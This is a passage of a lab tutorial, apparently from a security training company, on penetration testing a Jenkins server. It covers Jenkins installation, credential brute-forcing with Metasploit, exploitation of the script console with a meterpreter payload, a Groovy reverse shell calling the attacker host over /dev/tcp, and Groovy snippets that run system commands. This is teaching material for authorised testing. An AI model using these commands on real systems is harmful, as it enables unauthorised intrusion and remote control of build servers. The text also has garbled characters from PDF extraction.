Jenkins Penetra�on Tes�ng
1|Page
� Jenkins Penetration Testing
Contents
Introduc�on ............................................................................................................................................ 3
Lab Setup................................................................................................................................................. 3
Installa�on .............................................................................................................................................. 3
Configura�on .......................................................................................................................................... 5
Enumera�on............................................................................................................................................ 9
Exploita�on using Metasploit Framework: ........................................................................................... 10
Exploi�ng Manually (Reverse Shell) ...................................................................................................... 12
Execu�ng Shell Commands Directly ...................................................................................................... 16
Conclusion ............................................................................................................................................. 18
2|Page
� Jenkins Penetration Testing
Introduction
Jenkins Penetra�on Tes�ng is essen�al for iden�fying security vulnerabili�es in Jenkins, an open-
source automa�on server used for con�nuous integra�on (CI) and con�nuous delivery (CD). Built on
Java, Jenkins u�lizes a scrip�ng pla�orm to automate tasks such as building, tes�ng, and deployment
in the so�ware development lifecycle. This automa�on accelerates development cycles, enhances
code quality, and streamlines releases. Key features include CI/CD pipelines, automated tes�ng,
integra�on with version control systems, extensibility via plugins, and robust monitoring and
repor�ng capabili�es.
Lab Setup
In this ar�cle, we are going to setup the Jenkins server on the ubuntu machine and obtain the
remote code execu�on. Following are the machines:
Target Machine: Ubuntu (192.168.1.4)
Atacker Machine: Kali Linux (192.168.1.7)
Installation
For Jenkins to func�on, it necessitates the Java Run�me Environment (JRE). In this guide, we'll u�lize
OpenJDK to establish the Java environment. OpenJDK's development kit incorporates JRE within its
framework.
apt install openjdk-11-jdk
At �mes, the default Ubuntu repository may lack the latest Jenkins version. Therefore, we suggest
op�ng for the project-maintained repository to access the most recent features and patches.
To integrate the Jenkins repository into the Ubuntu system, adhere to the following:
3|Page
� Jenkins Penetration Testing
Begin by impor�ng the GPG key to ensure package integrity.
sudo curl -fsSL https://pkg.jenkins.io/debian-stable/jenkins.io-2023.key | sudo tee
/usr/share/keyrings/jenkins-keyring.asc > /dev/null
Following that, incorporate the Jenkins repository and append the authen�ca�on key to the source
list using the command provided below:
sudo echo deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc] https://pkg.jenkins.io/debian-stable
binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list > /dev/null
Now we can proceed with the Jenkins installa�on in the ubuntu machine.
apt install Jenkins
A�er installa�on is complete, Jenkins can be started using the following command:
4|Page
� Jenkins Penetration Testing
systemctl start jenkins
Status can be checked using the following command:
systemctl status Jenkins
Configuration
Post installa�on, Jenkins can be configured to run smoothly. By checking the service running on port
8080, the Jenkins server requires an Administrator password.
5|Page
� Jenkins Penetration Testing
Password can be obtained by reading the content of the ini�alAdminPassword file.
cat /var/lib/Jenkins/secrets/initialAdminPassword
Select the Install suggested plugins to Customize Jenkins and proceed with the installa�on.
6|Page
� Jenkins Penetration Testing
The final step requires the crea�on of First Admin User username and password. Here we are using
the username as raj and password as 123.
7|Page
� Jenkins Penetration Testing
Finally, entering the URL to access the Jenkins Server. The URL can be entered as
htp://127.0.0.1:8080/ as we want to setup the server on the ubuntu machine.
8|Page
� Jenkins Penetration Testing
Enumeration
A�er successfully installing and configuring the Jenkins server, we can start the exploita�on using the
kali machine. Star�ng with the enumera�on, since at port 8080 the Jenkins Server is running in the
ubuntu machine hence checking the port 8080. At port 8080 there is a Jenkins login page which
requires creden�als.
9|Page
� Jenkins Penetration Testing
Exploitation using Metasploit Framework:
Since the login page requires creden�als, hence we can use the auxiliary available in the Metasploit
framework to check for the valid username and password to login. The auxiliary which we will be
using will require a username file and a password file.
Firstly, in CTF scenarios, you can use the username file as the common usernames list (SecLists -
Names) and the password file as rockyou.txt. However, we use a custom dic�onary here to make
the scanning process easier. You can execute the following commands inside the Metasploit
Framework:
use auxiliary/scanner/http/jenkins_login
set rhosts 192.168.1.4
set rport 8080
set targeturi /
set user_file users.txt
set pass_file passwords.txt
set verbose false
exploit
10 | P a g e
� Jenkins Penetration Testing
Next, observe that the username and password have been enumerated successfully. A�erwards,
use these creden�als to exploit the target. You can use the exploit located at
exploit/mul�/htp/jenkins_script_console. Use the following Metasploit commands to run the
exploit:
use exploit/multi/http/jenkins_script_console
show targets
set target 1
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 192.168.1.4
set rport 8080
set targeturi /
set username raj
set password 123
exploit
11 | P a g e
� Jenkins Penetration Testing
Observe that the reverse shell has been obtained a�er the exploit has been successfully executed.
Exploiting Manually (Reverse Shell)
To proceed with manual exploita�on, you need the username and password of the Jenkins Console.
Assuming the atacker has already discovered the creden�als through brute forcing or any other
method, they can log into the console successfully.
Once logged in using the previously discovered creden�als (raj:123) from the auxiliary module, you
can access the Manage Jenkins func�onality, which includes the Script Console.
12 | P a g e
� Jenkins Penetration Testing
In Jenkins Penetra�on Tes�ng, Groovy serves as the main scrip�ng language for defining jobs and
pipelines. Groovy, being dynamic and opera�ng on the Java Virtual Machine (JVM), seamlessly
integrates with Jenkins, which is predominantly Java-based. Therefore, we are going to use the
Groovy reverse shell script to obtain the reverse shell. The command for the Groovy reverse shell can
be obtained from the following URL: htps://www.revshells.com by selec�ng the Groovy script
payload.
13 | P a g e
� Jenkins Penetration Testing
Now, using the above groovy reverse shell script in the Jenkins script console. Before running the
script make sure to start the netcat listener at port 443 inside kali machine using the following
command:
rlwrap nc -lnvp 443
14 | P a g e
� Jenkins Penetration Testing
Finally, the reverse shell is obtained at port 443 a�er running the above groovy script.
An alternate way to get the reverse shell can be by running the following script in the script console:
15 | P a g e
� Jenkins Penetration Testing
r = Runtime.getRuntime()
p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/192.168.1.7/443; cat <&5 | while read line; do \$line
2>&5 >&5; done"] as String[])
p.waitFor()
Make sure to start the listener at port 443 before running the script.
Observe that the reverse shell is obtained at port 443 a�er the execu�on of the script.
Executing Shell Commands Directly
There are cases where we don’t have a listener to take the reverse shell. In those cases, we can
directly run the script and obtain the output of the code in the Result window.
The following code is used to get the output of the system commands:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
16 | P a g e
� Jenkins Penetration Testing
Observe that a�er you run the script, you can see the output directly in the Result window.
You can use a similar code to get the command output in the Result window:
def proc = "id".execute();
def os = new StringBuffer();
proc.waitForProcessOutput(os, System.err);
println(os.toString());
17 | P a g e
� Jenkins Penetration Testing
Observe that a�er you run the script, you can see the output directly in the Result window.
Conclusion
In summary, Jenkins Penetra�on Tes�ng reveals the possibility of using Jenkins servers to gain a
reverse shell, emphasizing the crucial need for strong security prac�ces. Whether due to
compromised logins or no authen�ca�on at all, the vulnerability of Jenkins servers shows why we
must take security seriously. It's essen�al for organiza�ons to enforce strict access rules, conduct
regular security checks, and promptly update systems to reduce the chances of unauthorized access
and misuse.
18 | P a g e
� JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER
Bug Bounty Network Security
Ethical Hacking Essentials
Network Pentest
Wireless Pentest
ADVANCED
Burp Suite Pro Web Pro Computer
Services-API Infrastructure VAPT Forensics
Advanced CTF
Android Pentest Metasploit
EXPERT
Red Team Operation
Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment
www.ignitetechnologies.in
